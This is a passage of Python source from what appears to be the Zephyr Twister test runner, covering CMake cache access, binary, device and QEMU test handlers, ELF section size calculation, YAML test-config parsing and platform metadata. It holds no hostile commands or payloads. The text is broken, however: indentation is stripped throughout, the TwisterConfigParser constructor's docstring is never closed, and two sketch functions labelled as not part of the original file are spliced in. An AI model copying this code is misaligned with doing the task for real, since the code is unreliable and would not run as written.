else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
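# Minimal usage sketch (not part of the original file). The cache path and entry
# names below are assumptions; any CMakeCache.txt produced by a build should work.
def _example_cmake_cache(build_dir):
    cache = CMakeCache.from_file(os.path.join(build_dir, 'CMakeCache.txt'))
    board = cache.get('CACHED_BOARD')            # None if the entry is absent
    modules = cache.get_list('ZEPHYR_MODULES')   # always a list, possibly empty
    return board, modules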
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
        # encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
        If test suite names were found in the test's C source code, verify that
        the suite names detected in the output correspond to the expected suite
        names (and not the reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
        Change the result of the performed test if a problem with a missing or
        improper suite name occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
        self.instance.reason = "Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
            # Set capture_coverage to True to indicate that coverage data
            # should follow right after the test results; otherwise we exit
            # from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
            # Receive parameters from a runner_params field
# of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
        # Sometimes a test instance hasn't been executed successfully and ends
        # up with no status; fill the results in as blocked so that it is
        # included in the final report.
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
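# Minimal sketch (not part of the original file) of the '--west-flash' handling
# described in the comments inside DeviceHandler.handle() above: a bare flag
# yields [], a single value yields that string, and comma-separated values become
# extra arguments appended after '--'.
def _example_west_flash_command(build_dir, west_flash):
    command = ["west", "flash", "--skip-rebuild", "-d", build_dir]
    extra = []
    if west_flash and west_flash != []:
        extra = west_flash.split(',')            # e.g. "--board-id=42,--erase"
    if extra:
        command.append('--')
        command.extend(extra)
    return command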
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
        The guest virtual time in QEMU icount mode isn't host time; it is
        maintained by counting guest instructions. We therefore use the QEMU
        process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
        # Disable internal buffering; we don't want read() or poll() to ever
        # block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
        # grep cannot be used because it exits with an error if the symbol
        # is not found.
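        # Illustrative nm output line (assumed format):
        #   "00000001 A CONFIG_XIP"
        # awk prints the third field, i.e. the symbol name, when present.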
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
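        # Illustrative `objdump -h` section line (assumed layout):
        #   "  9 rodata        000032a0  00014320  00014320  00014320  2**3"
        # words: [index, name, size, vma, lma, file off, alignment]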
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
        @param filename Source .yaml file to read
        @param schema YAML schema used to verify the file contents
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
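        # Illustrative conversions (assuming typestr values used by the schema):
        #   _cast_value("60", "int")         -> 60
        #   _cast_value("a b c", "set")      -> {"a", "b", "c"}
        #   _cast_value("1 2 3", "list:int") -> [1, 2, 3]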
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
                    whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
